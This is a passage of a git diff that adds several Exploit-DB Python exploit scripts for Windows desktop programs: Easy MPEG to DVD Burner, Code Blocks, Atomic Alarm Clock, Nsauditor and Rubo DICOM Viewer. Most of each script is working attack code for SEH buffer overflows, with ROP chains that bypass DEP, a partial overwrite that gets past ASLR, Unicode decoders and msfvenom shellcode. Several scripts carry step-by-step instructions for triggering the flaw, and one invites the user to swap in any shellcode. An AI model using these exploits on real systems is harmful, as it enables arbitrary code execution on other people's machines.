+shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
+shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
+shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
+shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
+shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
+shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
+shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
+shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
+shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
+shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
+shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
+shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
+shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
+shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
+shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
+shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
+shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
+shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
+shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
+shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
+shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
+shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
+shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
+shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
+shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
+shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
+shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
+shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
+shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
+shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
+shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
+shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
+shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
+shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
+shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
+shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
+shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
+shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
+shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
+shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
+shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
+shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
+shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
+shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
+shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
+shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
+shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
+shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
+shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
+shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
+shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
+shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
+shellcode += "\x43\x49\x6f\x68\x55\x41\x41"
+
+
+
+buffer = offset + nseh + seh + nops + shellcode
+
+f = open(file,'w')
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py
new file mode 100755
index 000000000..355fbea67
--- /dev/null
+++ b/exploits/windows/local/48339.py
@@ -0,0 +1,150 @@
+# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
+# Date: 2020-04-15
+# Exploit Author: Bailey Belisario
+# Tested On: Windows 7 Ultimate x64
+# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
+# Version: 1.7.11
+# Exploit Length: 1015 Bytes
+# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)
+
+# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow
+# Exploit used with Python2.7
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Bad Characters: \x00\x0a\x0d #
+# SEH Offset: 1012 #
+# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
+#------------------------------------------------------------------------------------------------------------------------------------#
+
+# Register setup for VirtualProtect() (Bypass DEP) :
+#---------------------------------------------------
+# EAX = Points to PUSHAD at time VirtualProtect() is called
+# ECX = lpflOldProtect (0x10047d30 as writable location)
+# EDX = flNewProtect(0x40)
+# EBX = dwSize (0x92)
+# ESP = lpAddress (automatic)
+# EBP = ReturnTo (ptr to jmp esp)
+# ESI = ptr to VirtualProtect()
+# EDI = ROP NOP (RETN)
+
+import struct
+
+def create_rop_chain():
+
+ rop_gadgets = [
+
+ # Put 1 in EDX and decrement to 0
+ 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
+ 0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
+ 0x11111111, # Filler
+
+ # Pop the pointer of VirtualProtect into EAX
+ 0x10037b12, # POP EAX # RETN
+ 0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll]
+
+ # Dereference Pointer into EDX then move back to EAX
+ 0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
+ 0x10031772, # MOV EAX,EDX # RETN
+ 0x11111111, # Filler
+ 0x11111111, # Filler
+ 0x11111111, # Filler
+
+ # Push VP and pop into EBP
+ 0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
+ 0x10037b12, # POP EAX # RETN
+ 0x11111111, # Filler
+ 0x11111111, # Filler
+ 0x11111111, # Filler
+
+ # Use this to get to address needed to Pop VP into ESI
+ 0x1003619e, # POP EAX # POP ESI # RETN
+
+ # Move VP to +12 on stack then push the POP POP RETN
+ 0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
+ 0x11111111, # Filler popped
+ 0x11111111, # Filler popped
+
+ # Set ESI to VP
+ 0x1002e1ce, # POP ESI # RETN [SkinMagic.dll]
+ 0x11111111, # Where VP is MOV into
+
+ # Set EBP with POP EBP RETN
+ 0x1002894f, # POP EBP # RETN [SkinMagic.dll]
+ 0x1002894f, # skip 4 bytes [SkinMagic.dll]
+
+ # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
+ # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
+ 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
+ 0x10037b12, # POP EAX # RETN
+ 0x1005a0a0, # Address of 3F
+ 0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN
+
+ # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
+ # Note: This should be at least length of shellcode
+ 0x100362c6, # XOR EAX,EAX # RETN
+ 0x10033fb2, # ADD AL,0C9 # RETN
+ 0x10033fb2, # ADD AL,0C9 # RETN
+ 0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN
+
+ # Set ECX to writable location
+ 0x1003603f, # POP ECX # RETN [SkinMagic.dll]
+ 0x10047d30, # &Writable location [SkinMagic.dll]
+
+ # Set EDI to ROP NOP
+ 0x100395c2, # POP EDI # RETN [SkinMagic.dll]
+ 0x10032982, # RETN (ROP NOP) [SkinMagic.dll]
+
+ # Do PUSHAD and be 1337
+ 0x10037654, # POP EAX # RETN
+ 0xa140acd2, # CONSTANT
+ 0x100317c8, # ADD EAX,5EFFC883 # RETN
+ 0x1003248d, # PUSH EAX # RETN
+
+ # Used to jump to ESP
+ 0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll]
+ ]
+ return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+ropChain = create_rop_chain()
+
+# CALC.EXE for POC
+shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
+ "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
+ "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
+ "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
+ "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
+
+# 148 Bytes needed to return to ROP CHAIN
+paddingBeginning = "B"*148
+
+# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)
+nopLen = 444 - len(ropChain)
+nopSled = '\x90'*nopLen
+
+# Padding to SEH needs to consider the 420 bytes remaining - shellcode
+paddingMiddleLen = 420 - len(shell)
+paddingMiddle = 'B'*paddingMiddleLen
+
+# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
+# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
+seh = "\xee\x43\x40"
+
+# Exploit Visualization #
+#------------------------#
+# BBBBBBBBBBBBBBBBBBBB #
+#------------------------#
+# ROP CHAIN #
+#------------------------#
+# NOPS #
+#------------------------#
+# SHELL CODE #
+#------------------------#
+# BBBBBBBBBBBBBBBBBBBB #
+#------------------------#
+# SEH #
+#------------------------#
+
+exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh
+
+file = open("pwn.txt", 'w')
+file.write(exploit)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48344.py b/exploits/windows/local/48344.py
new file mode 100755
index 000000000..0fae1bb8c
--- /dev/null
+++ b/exploits/windows/local/48344.py
@@ -0,0 +1,31 @@
+# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
+# Date: 2020-04-17
+# Exploit Author: T3jv1l
+# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
+# Software version: 16.01
+
+
+buffer="A"*536 #buffer
+buffer+="\x61\x41" #POPAD + Aligned
+buffer+="\xF2\x41" #POP/POP/RET
+
+#----------------------Align the eax to point to the shellcode PART -----------------------
+#buffer+="\x90" #NOP
+#buffer+="\x6e" #venetian padding
+#buffer+="\x05\x37\x13" #add eax, 0x13003700
+#buffer+="\x6e"
+#buffer+="\x2d\x36\x13" #sub eax, 0x13003600
+#buffer+="\x6e" #venetian padding
+#buffer+="\x50" #push eax
+#buffer+="\x6e" #Venetian padding
+#buffer+="\xc3" #ret
+
+#----------------------Shellcode PlaceHOLDER ----------------------------------------------
+#uffer+="\x90"*111
+#buffer+=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM01PDIJEP1Y0QT4KPPNPTK1BLLTK1BMDDKSBNHLO6WPJNFNQKOVLOLC13LM2NLO07QXOLMKQ7WJBZR220WDKQBN0TKOZOLTKPLN1T8ZCOXKQZ10QTKQIMPKQXSTKOYLXISOJ19TKNTTKM1XV01KOFL7Q8OLMKQGW08YPD5L6KSSMJXOKSMMTBU9TPXDKR8MTKQYCRF4KLLPKTKPXMLKQJ3TKKTDKKQZ0E9OTMTO4QK1K1Q291JPQKO9PQOQOQJTKN2JKDM1MRJKQ4M3UGBKPM0M0R0RHNQTKRO4GKOXUWKL0VU6BPVQXVFDU7MUMKO9EOLM63LLJE0KKYP2UM5WKOWN3T2RORJKP1CKOJ5BCS1RL33NNS5RX2EKPA")
+buffer+="\xcc\xcc\xcc\xcc"
+buffer+="\x90"*(5000-len(buffer))
+f=open('exploit.m3u','w');
+f.write(buffer);
+f.close();
+print "[+] File created."
\ No newline at end of file
diff --git a/exploits/windows/local/48346.py b/exploits/windows/local/48346.py
new file mode 100755
index 000000000..b80cee14b
--- /dev/null
+++ b/exploits/windows/local/48346.py
@@ -0,0 +1,97 @@
+# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-17
+# Vendor: Drive Software Company
+# Vendor Site: http://www.drive-software.com
+# Software Download: http://www.drive-software.com/download/ataclock.exe
+# Tested On: Windows 10 - Pro 1909 (x86)
+# Version: Atomic Alarm Clock 6.3 beta
+# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer
+
+File = 'poc.txt'
+
+os_nSEH = '\x41'*(461)
+nSEH = '\xeb\x05' # jmp short +2
+SEH = '\x47\x47' # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
+#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False
+
+getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
+getPC += '\x61' # popad # [ESP] = &Payload
+getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes
+
+ebx2eax = '\x58' # pop eax # EAX = &Payload
+ebx2eax += '\x72' # add [edx], dh
+
+# Ajust EAX to &Decoder
+getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
+getDecoder += '\x72' # add [edx], dh
+getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
+getDecoder += '\x72' # add [edx], dh
+getDecoder += '\x50' # push eax # [ESP] = &Decoder
+getDecoder += '\x72' # add [edx], dh
+
+#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
+firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
+## 2nd byte - \x00 => \x5F
+venBlinds = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'
+## 4th byte - \x00 => \x33
+venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
+## 6th byte - \x00 => \x33
+venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
+## 8th byte - \x00 => \x66
+venBlinds += '\xC6\x66\x72\x40\x72\x40\x72'
+## 10th byte - \x00 => \x10
+venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
+## 12th byte - \x00 => \x33
+venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
+## 14th byte - \x00 => \x42
+venBlinds += '\xC6\x42\x72\x40\x72\x40\x72'
+## 16th byte - \x00 => \x32
+venBlinds += '\xC6\x32\x72\x40\x72\x40\x72'
+## 18th byte - \x00 => \x02
+venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
+## 20th byte - \x00 => \x10
+venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
+## 22nd byte - \x00 => \x3F
+venBlinds += '\xC6\x3F\x72\x40\x72\x40\x72'
+## 24nd byte - \x00 => \x1F
+venBlinds += '\xC6\x1F\x72\x40\x72\x40\x72'
+## 26th byte - \x00 => \x49
+venBlinds += '\xC6\x49\x72\x40\x72\x40\x72'
+## 28th byte - \x00 => \x02
+venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
+## 30th byte - \x00 => \xED
+venBlinds += '\xC6\xED\x72\x40\x72\x40\x72'
+## 32nd byte - \x00 => \xC3
+venBlinds += '\xC6\xC3\x72\x40\x72'
+# Jump to the decoded decoder by Returning to the address we saved on the stack
+venBlinds += '\xC3' # ret [!] Now we are executing the decoder!
+
+os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
+
+# Custom PopCalc shellcode that avoids the bad characters
+fKernel32 = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'
+
+gExpotTbl = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'
+
+fWinExec = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'
+
+# Call WinExec( CmdLine, ShowState );
+# CmdLine = "calc.exe"
+# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
+callWinExec = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'
+
+shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
+
+buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
+filler = '\x77'*(9000-len(buffer))
+buffer = buffer+filler
+
+try:
+ payload = buffer
+ f = open(File, 'w')
+ f.write(payload)
+ f.close()
+ print File + " created successfully"
+except:
+ print File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/48350.py b/exploits/windows/local/48350.py
new file mode 100755
index 000000000..f0465e041
--- /dev/null
+++ b/exploits/windows/local/48350.py
@@ -0,0 +1,108 @@
+# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
+# Date: 2020-04-17
+# Exploit Author: Cervoise
+# Vendor Homepage: https://www.nsauditor.com/
+# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.1.0 and 3.0.28
+# Tested on: Windows 10.0.18363.778 x86 Pro EN
+
+# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES
+(https://www.exploit-db.com/exploits/46005)
+# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still
+vulnerable
+
+# 1 -> Change the shellcode with the one you want
+# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
+# 3 -> Open Nsauditor
+# 4 -> In the Window select "Tools" -> "Dns Lookup"
+# 5 -> Paste the content into the Field: "Dns Query'"
+# 6 -> Click "Resolve"
+
+#!/usr/bin/python3
+
+# Badchars ->
+\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
+# Maybe less badchars between \x80 and \x9f but I was lazy (I just
+checked thoose I needed)
+
+# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v
+shellcode
+shellcode = b""
+shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
+shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
+shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
+shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
+shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
+shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
+shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
+shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
+shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
+shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
+shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
+shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
+shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
+shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
+shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
+shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
+shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
+shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
+shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
+shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
+shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
+shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
+shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
+shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
+shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
+shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
+shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
+shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
+shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
+shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
+shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
+shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
+shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
+shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
+shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
+shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
+shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
+shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
+shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"
+
+
+# 0x006ea017 : pop esi # pop ecx # ret | startnull
+{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
+SafeSEH: False, OS: False, v3.0.28.0 (C:\Program
+Files\Nsauditor\Nsauditor.exe)
+# 0x006ea017 : pop esi # pop ecx # ret | startnull
+{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
+SafeSEH: False, OS: False, v3.2.1.0 (C:\Program
+Files\Nsauditor\Nsauditor.exe)
+
+pop_pop_ret = b"\x17\xa0\x6e"
+jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5
+
+# An address near the end of our buffer is on the stack, only three pop
+are needed to get it
+# Then we just have to moving at the begging of our buffer
+# An egghunter does the job, but will not be compatible with all Windows
+versions
+going_back = b"\x58" #POP EAX
+going_back += b"\x58" #POP EAX
+going_back += b"\x58" #POP EAX
+going_back += b"\x83\xE8\x79" #SUB EAX,0x79
+going_back += b"\x83\xE8\x79" #SUB EAX,0x79
+going_back += b"\x83\xE8\x79" #SUB EAX,0x79
+going_back += b"\x83\xE8\x79" #SUB EAX,0x79
+going_back += b"\x83\xE8\x79" #SUB EAX,0x79
+going_back += b"\xFF\xE0" #JMP EAX
+
+buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
+buffer += shellcode + b"\x90"*100
+buffer += going_back
+buffer += jmp_back + pop_pop_ret #nSEH / SEH
+
+# Write the exploit
+file = open("nsauditor-3-2-1-exploit.txt", "wb")
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48351.py b/exploits/windows/local/48351.py
new file mode 100755
index 000000000..19cec71f6
--- /dev/null
+++ b/exploits/windows/local/48351.py
@@ -0,0 +1,54 @@
+# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
+# Exploit Author: bzyo
+# Date: 2020-04-17
+# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
+# Vendor Homepage: http://www.rubomedical.com/
+# Version: 2.0
+# Software Link : http://www.rubomedical.com/download/index.php
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate overview.txt, copy contents to clipboard
+# 2. open application
+# 3. select send dicom files, edit
+# 4. paste contents from clipBoard to "DICOM server name" field
+# 6. pop calc
+
+#!/usr/bin/python
+
+import struct
+
+junk1 = "A"*1868
+
+#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
+seh = struct.pack('<L',0x00402f0e)
+
+jmp1 = "\xeb\xf8\xcc\xcc"
+
+jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
+#Payload size: 220 bytes
+calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
+"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
+"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
+"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
+"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
+"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
+"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
+"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
+"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
+"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
+"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
+"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
+"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
+"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
+"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")
+
+junk2 = "\x90"*14
+
